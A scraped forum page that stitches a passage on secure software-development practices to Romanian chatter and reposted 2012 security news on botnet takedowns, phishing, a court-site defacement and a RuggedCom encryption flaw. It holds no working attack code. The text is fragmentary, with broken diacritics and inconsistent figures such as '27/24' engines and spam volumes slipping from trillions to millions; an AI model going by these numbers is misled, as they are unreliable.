testing. Using “production” data may permit access to information that the developers do not have a need to know. Only a comprehensive security policy focusing on personnel, operation, and configuration management can provide the safeguards necessary to secure an organization’s assets. Many organizations conduct background checks, credit checks, and drug tests when hiring new employees as part of their security policy. Security clearances issued by governmental agencies have specific terms; non-governmental organizations should also re-screen development personnel periodically. Some would argue that things like random drug tests and periodic security screenings are intrusive, and they are. However, developers need to understand that just as organizations use locks on doors to protect their physical property, they need to conduct periodic security screenings to protect intellectual property and financial assets from those that have the greatest access. Another element of a robust development security policy is to have separate development and production systems. Developing software in the production environment exposes organizational assets to a number of threats, such as debugging tools or simply writing a program to gain unauthorized access to information stored on the system. Recent publicity on the STUXNET worm suggests that a robust development security policy will prohibit the use of external media, such as CD’s, DVD’s, and USB devices [9]. Another important point about the STUXNET worm is that it targeted a development tool, and the tool introduced the malicious functionality. Configuration management is the traditional technique for controlling the content of deliverable components and is an essential element of a robust security policy [10]. Of the six areas of Configuration Management, the two areas having the greatest effect on security are configuration control and configuration audits. Version control tools, such as Clearcase and CVS, provide many of the features required by configuration control. A configuration audit is an inspection occurring after all work on a configuration item is complete, and it assures that all of the physical elements and process artifacts of the configuration item are in order. Version control tools prevent two or more programmers from over-writing each other’s changes. Most version control systems permit anyone with authorized access to check source code “in” and “out” without an authorized change request, and some do not even track the last access to a source module. However, in a secure environment, a version control system must integrate with the defect tracking system and record the identification of the developers who accessed a specific source module. Integrating the version control system with the defect tracking system permits only the developer assigned to make a specified change to have access to the related source code. It is also important for the version control system to track the developers that access the source. Frequently, developers copy source code from a tested component or investigate the approach used by another developer to address a specific issue and need access to read source modules that they are not maintaining. This also provides a good research tool to introduce malicious functionality into another source module. By logging source module access, security personnel can monitor access to the source code. Configuration audits are the second management technique making a development organization more secure. Audits range in formality from a clerk using a checklist verifying that all of the artifacts required for a configuration item are submitted, to a multi-person team assuring that software delivered produces the submitted artifacts and the tests adequately address risks posed by the configuration item [11]. Some regulatory agencies require audits for safety critical applications/high reliability applications to provide an independent review of the delivered product. An audit in a high security environment addresses the need to assure that delivered software does not expose the organizational assets to risk from either defects or malicious functionality. Artifacts submitted with a configuration item can include, but are not limited to, requirements or change requests implemented, design specification, test-script(s) source code, test data, test results and the source code for the configuration item. To increase confidence that the delivered software does not contain defects or malicious functionality, auditors should assure that the test cases provides 100% coverage of the delivered source code. This is particularly important with interpreted programming languages, such as python or other scripting languages, because a defect can permit the entry of malicious code by a remote use of the software. Another approach auditors can use to assure coverage is to re-test the configuration item with the same test data to assure that the results from the re-test match those produced in the verification and validation procedure. Adopting these recommendations for a stronger configuration management process modifies the typical unit-level development process, illustrated in Figure 1, to a more secure process illustrated in Figure 2. In the more secure process, a formal change authorization is generated by a defect tracking system or by the version control system’s secure change authorization function. Next, a specified developer makes the changes required by the change authorization. After implementing and testing the changes, the developer checks all of the artifacts (source code, test drivers, and results) into the version control system. Checking the artifacts automatically triggers a configuration audit of the development artifacts. Auditors may accept the developer’s changes or create a new work order for additional changes. Unlike the review panel, the auditors may re-test the software to assure adequate coverage and that the test results match those checked in with the source code. Making this change to the development process significantly reduces the exposure to accidental defects or malicious functionality because it is verifying the source code deployed in the final product with all of its supporting documentation. Following all of these recommendations will not guarantee the security of the software development environment. T because there are always new vulnerabilities from social engineering. However, using reoccurring security checks, separating developers from production systems and data, controlling media, and using rigorous configuration management practices should make penetration of your information security perimeter more difficult. It is also necessary to conduct a periodic review of development tools and configuration management practices because threat agents will adapt to any safeguard that does not adapt to new technology. References: [1] N. Antunes and M. Vieira, “Defending against Web Application Vulnerabilites,” Computer, vol. 45, pp. 66-72, 2012. [2] N. Davis, W. Humphrey, S. T. R. Jr., G. Zibulski, and G. McGraw, “Processes for Producing Secure Software: Summary of US National Cybersecurity Summit Subgroup Report,” IEEE Security and Privacy, vol. 2, pp. 18-25, 2004. [3] G. McGraw and G. Morrisett;, “Attacking Malicious Code: A Report to the Infosec Research Council ” IEEE Softw., vol. 17, pp. 33-41, Sept.-Oct. 2000 2000. [4] M. E. Kabay, “A Brief History of Computer Crime: An Introduction for Students,” ed, 2008. [5] M. E. Kaybe. (2002, Salami fraud Network World Security Newsletter. Available: Salami fraud [6] (2012, Apr 14). SAMATE – Software Assurance Metrics And Tool Evaluation. Available: site changes [7] K. Schwaber and M. Beedle, Agile Software Development with Scrum. Upper Saddle River, NJ: Prentice-Hall, Inc., 2002. [8] K. Beck and C. Andres, Extreme Programming Explained: Embrace Change (2nd Edition): Addison-Wesley Professional, 2004. [9] R. Langner, “Stuxnet: Dissecting a Cyberwarfare Weapon,” IEEE SECURITY & PRIVACY, pp. 49-51, 2011. [10] A. Leon, A guide to software configuration management: Artech House, Inc., 2000. [11] N. R. Nielsen, “Computers, security, and the audit function,” presented at the Proceedings of the May 19-22, 1975, national computer conference and exposition, Anaheim, California, 1975. [12] Infosesc Institute Resources

ar fi fost mai frumos s? publici sursa, poate unii nu vor s? fie "limita?i" pe serverul t?u, s? le vad? al?ii datele, etc.. în rest, ai grij? la "vulnerabilit??i" , chit c? p?strezi tu loguri.. b?ie?ii de?tep?i le pot ?terge odat? ce iau acces înainte s?-?i dai seama ca au fost pe serverul t?u..

deci.. am r?mas f?r? host, am fost anun?a?i doar cu ~2 ore înainte, am f?cut backup la toat? platforma, în afar? de fi?ierele userilor... conturile ?i toate, sunt intacte, ca înaintea "opririi"... dar userii nu mai au fi?ierele stocate... erau peste 100gb în total , ?i nu am apucat s? facem backup la timp . share-ul, public, ?i fi?ierele publice, am reu?it s? le copiem.. dar acum, chiar dac? l-am redeschide, to?i userii î?i vor pierde fi?ierele... voi a?i mai vrea s?-l folosi?i chiar dac? v? pierde?i fi?ierele..?

dac? mai sunt ?i blonde.. e potop !

It's been over a month since spam-spewing botnet Grum has been shut down, but spam experts say there hasn't been a noticeable impact on global spam volume. Security researchers from FireEye worked with Internet service providers in Russia, the Netherlands, and Panema to shut down the command-and-control servers controlling the Grum botnet.. The last server Ukraine was shut down July 18. Symantec researchers at the time estimated that Grum was responsible for one-third of all spam being sent worldwide, and its takedown led to an immediate drop in global spam email volumes by as much as 15 to 20 percent, according to July's Symantec Intelligence Report. However, the drop was only temporary, since in the days since, the global volumes have been creeping up, Eric Park, an Abuse Desk Analyst at Symantec, told SecurityWeek. In fact, if the present trend continues, August may wind up with a higher global spam volume than in July, Park said. According to Symantec's July report, global spam volume was 67.6 percent (1 in 1.48 emails was flagged as spam), an 0.8 percent increase over June. There's been "minimal to no change" in spam as a result of the Grum takedown, Park said. While Grum had an estimated hundred thousand zombies sending spam, the machines were likely blocked for sending emails too frequently, or wound up on IP blacklists, said Andrew Conway, Cloudmark researcher. IP filtering is fast and cheap, and is a good first line of defense against spam, Conway said. Grum spam was easy to blacklist, and despite its size, most spam messages from the botnet probably never reached user inboxes. Even in the heyday of spam botnets, in the period between 2007 and 2010, Grum was "a distant sixth" in terms of size and in number of spam generated, Mary Landesman, a senior security researcher at Cloudmark, told SecurityWeek. Rustock, shut down in 2011, had 150,000 bots and sent out 30 billion messages per day at its peak, compared to Grum, with a mere 50,000 bots and only 2 billion spam messages per day, Landesman said. The big players, such as Storm, Rustock, and Srizbi, are no longer in action, which left Cutwail, Bobax and Grum as the "top 3" spam botnets. Cutwail and Bobax has been up and down over the past two years and haven't really had much of an impact, making Grum appear to be a larger player in the botnet-drive spam space than it really was, Landesman pointed out. Considering that users never saw Grum-delivered spam to begin with, the lack of an impact is not surprising, Landesman said. Global spam has actually been declining since 2008. Symantec's Park ran some numbers, and saw that a month before the McColo botnet was shutdown in 2008, global spam volume was 5.8 trillion. In June 2008, when the botnet was shutdown, spam volume was 3.1 trillion, and a month later, spam had dropped even more to 2.5 million. The numbers crept up a bit after that, and a month before the Bredolab botnet and Spamit affiliates were knocked off line in 2010, total spam volume was 3.8 trillion. In October 2010, after the botnets were no longer operational, the spam volume was 2.9 trillion, and dropped to 2.4 million a month later. By the time Microsoft focused its attention on the Rustock botnet, global spam volume was a shadow of what it was before McColo's demise. A month before Rustock's shutdown, spam volume was 1.6 trillion. Volume dropped to 1.3 trillion in March 2011 when authorities seized the C&C servers, and slid down to 1.2 trillion a mother later. Each botnet shutdown has had less impact on global spam volumes compared to earlier shutdowns, Park pointed out. While the percentages look great —spam declined 57 percent after McColo, 37 percent after Bredolab and Spamit affiliates,and 25 percent after Rustock—the drop in numbers are getting smaller, Park said. While Park didn't have global spam volume figures handy for the most current month, he noted that daily global spam volume was about 25 billion in mid-June, a month before Grum's last C&S server was turned off on July 18. The number dropped to about 12 billion to 15 billion between July 18 and July 22, Park said. By Aug. 13, daily spam volume was consistently over 50 billion by Aug. 9. Recovering from the spam drop was really quick, surprisingly so, after the Grum takedown, Park said. The numbers are different, but the trend tells the same story when looking at spam volume figures from other companies. AppRiver saw spam volumes recover within a week to the levels observed in June, Troy Gill, a security analyst with AppRiver, told SecurityWeek. "We do not currently see any signs of a comeback from the Grum botnet, yet traffic remains equal to the rates we were seeing before the takedown," Gill said. It's important to note, also, that spammers have turned away from very large botnets for spam delivery in favor of smaller, more focused and presumably more easily managed botnets, Landesman said. This means there are more botnets, each one with less individual impact, while the total impact on global spam volume remained about the same. The spam-delivery market is "very fluid," Gunter Ollmann, vice-president of research at Damballa, told SecurityWeek. There are multiple "suppliers" offering medium-to-large botnets for spam campaigns, and the operators tend to "subscribe" to multiple suppliers, Ollmann said. As a result, "takedowns of an individual supplier can be counteracted within a day or two," Ollmann said. Symantec's Park also felt that the spammers had learned their lessons from previous takedowns and have diversified their infrastructure. Instead of one large botnet they are using for all their needs, they have multiple networks, one for fake pharmaceutical, one for online gambling, and so on, making it easy to remain in business even after one takedown. They've learned "not to put all their eggs in one basket," Park said. The Grum takedown has important implications from a law enforcement standpoint, because increasing the cost of business can act as a deterrent for future operations, Park and Landesman agreed. However, it's also important to consider the dissenting opinion, that the takedown did nothing to stop the criminals, and may have actually caused some harm, Gunter Ollmann, vice-president of research at Damballa, told SecurityWeek. "The 'Takedown' was ineffectual," Ollmann said, as it shut down servers but did nothing to stop the techniques the operators had used to infect victims and build the botnet in the first place, nor did it result in the arrests of the actual criminals. In fact, the "ill-conceived takedown" alerted the botnet operators to some of the mistakes the Grum team had made that allowed the researchers to track them, which means it will be even more difficult to build up future evidence against these spammers, Ollmann said. These actions have simply caused "the bot masters to improve their botnets and further insulate themselves from the errors that allow more strategic law enforcement operations to be successful," Ollmann said. Sursa

On Thursday, law enforcement officials with the Criminal Investigation and Detection Group (CIDG) and the Presidential Anti-Organized Crime Commission (PAOCC) in the Philippines arrested more than 300 in a cybercrime sweep. The arrests took place in several subdivisions, and the operation is being hailed as the biggest cybercrime operation in the nation’s history. According to a press release from the CIDG, working alongside elements from the PAOCC, the two agencies arrested 357 nationals, mostly Taiwanese and Mainland Chinese, when they raided 20 residential units in several subdivisions located in Quezon City, Manila, Marikina, Cainta, and Antipolo Cities where the foreigners were rounded up. The sweep was aimed at stopping a scam that initiated in China, where the group would call unsuspecting victims in China and introduce themselves as members of Chinese police. From there the victim would be told that their bank accounts were being used to launder money, or other terrorist funding, and be advised to move their funds to a safe account that the police provided. Given that no one wanted to upset the police, many of the victims agreed immediately. A similar scam took place in China earlier this year, but Chinese authorities broke it up – arresting 37 people in the process. In order to continue the operation, those who remained free from the law moved outside of the borders and established a new base of operations. Among those arrested on Thursday are two people thought to be the ringleaders of the scam, identified as Maria Luisa Tan and Jonson Tan Co. All the suspects were brought to the Police National Training Institute (PNTI) in Camp Vicente Lim, Laguna, the CIDG statement explained. Presently, all 357 of them are waiting while charges for violation of the Access Device Act are compiled. Sursa

Cybercriminals Target Blackberry Users in Phishing Campaign Security researchers from Websense have discovered a new malware campaign targeting BlackBerry customers. The malicious emails say that the recipient has successfully created a Blackberry ID, and attempts to infect their system via a malicious attachment. "To enjoy the full benefits of your BlackBerry ID, please follow the instructions in the attached file," the email reads. As Websense notes, the email itself is actually a copy and paste of a legitimate email that would come from Blackberry when someone signs up for a BlackBerry ID. According to Websense, if the malicious attachment is run, it then drops other executable files and modifies the system registry to automatically launch the malware programs when the system is booted up. At the time of publishing, only 27/24 anti-virus engines identify the malware in VirusTotal. Sursa

A group claiming to be associated with Anonymous has taken responsibility for the attack. A Russian court Web site has been defaced following a verdict that saw the members of the all-female punk-rock band Pussy Riot sentenced to two years in jail. The Khamovnichesky District Court was hacked today by a group claiming to be affiliated with the U.S. branch of Anonymous. The site uploaded a message in Russian saying that it doesn't "forget" or "forgive." The group also posted a Pussy Riot song, called "Putin Is Lighting the Fires of the Revolution," and video of Bulgarian singer Aziz. The BBC was first to report on the news. Pussy Riot band members were arrested in March after performing a "punk prayer" in Moscow's main cathedral, requesting the Virgin Mary to save Russia from President Vladimir Putin. A judge last week sentenced all three band members to two years in prison for their act of dissent. Their arrest and trial has lit a firestorm across the world over individual rights in Russia. And many "hacktivist" groups have come out in support of the band. One such group, Anti Leaks, took down Russian news site RT.com with a DDoS attack last week. Pussy Riot band members were found guilty of "hooliganism motivated by religious hatred." VIDEO : http://i.d.com.com/av/video/embed/player.swf?playerType=embedded&type=id&value=50129640 Sursa

The U.S. Department of Homeland Security is probing Siemens' technology that may allow hackers to attack critical infrastructure, such as power plants. The U.S. Department of Homeland Security has issued an alert warning that hackers could exploit code in Siemens-owned technology to attack power plants and other national critical infrastructure. Security researcher Justin Clarke exposed the flaw at a Los Angeles conference last week, claiming he discovered a way of spying on encrypted traffic in hardware owned by a Siemens subsidiary, RuggedCom. The DHS advisory noted: "An attacker may use the key to create malicious communication to a RuggedCom network device." DHS added that the government department was in contact with RuggedCom and the researcher in order to identify the flaw and find a resolution to the vulnerability. Clarke said that the Siemens-owned technology maker used a single software key to decode encrypted traffic that flows across its network, and has discovered a way to extract the key, which could then be used to send malware or credentials to the critical systems. "If you can get to the inside, there is almost no authentication, there are almost no checks and balances to stop you," Clarke said, reports Reuters. According to the BBC, this is the second time Clarke has reported a flaw in RuggedCom's technology after purchasing the firm's second-hand equipment from eBay. RuggedCom updated its software after Clarke found the first 'backdoor' that would have allowed hackers to access equipment remotely with an easily extracted password. Though the risk of cyberattacks continue to plague the governments around the world, there have been no such reports of successful attacks on U.S. critical systems yet. Iran is known to have suffered from the Stuxnet malware that caused physical damage to its nuclear facilities, in response to global concerns that Tehran was building a nuclear bomb. Similar malware, dubbed Flame, was described as the "most complex" cyberweapon ever discovered by Kaspersky Lab. Sursa

The Web titan is building a group dedicated to finding and solving "subtle, unusual, and emergent" problems with its products. Google, which settled a privacy case with the U.S. Federal Trade Commission (FTC) last week, is building a "red team" dedicated to solving privacy problems. The team will be focused on tracking down and fixing privacy risks within the company's products, services, and businesses processes. Its existence came to light after a Google posted a job advertisement seeking a "Data Privacy Engineer, Privacy Red Team". The advertisement says: Kaspersky Lab's ThreatPost blog says that while the concept of a "red team" is far from new -- red teams have been used by companies for decades to identify and block methods of circumventing security systems -- Google's move to confront issues "that could involve user privacy risks is perhaps a unique one." Google was recently hit with a $22.5 million fine by the FTC -- the largest it has ever issued for violation of one of its orders -- over charges that it "placed an advertising tracking cookie on the computers of Safari users who visited sites within Google's DoubleClick advertising network." The FTC found Google had automatically set the third-party cookies on Safari, despite the Apple browser being set up to reject such cookies by default. Sursa

^ petro?ani, hmm, mâine trec pe acolo, eventual un num?r de telefon ceva?

// ?i-am reformulat postul corespunz?tor

jneboon? ?i-ai ?i g?sit unde s? postezi..

e interpretabil? ca, Constitu?ia.. îl a?tept?m pe Ponta s? "dea directive clare, ca to?i oamenii s? o interpreteze în modul corespunz?tor" dac? r?spunsul ( probabilitatea de a alege un r?spuns corect ) trebuie s? se afle printre r?spunsurile de jos, e imposibil, e paradoxal. e ca ?i în "paradoxul mincinosului" , "aceast? propozi?ie e fals?" , dac? e adev?rat c? e fals?, atunci afirma?ia ar deveni adev?rat?, dar ar însemna c? e fals?, iar dac? e fals?, propozi?ia ar fi adev?rat?, deoarece spune c? propozi?ia respectiv? e fals?..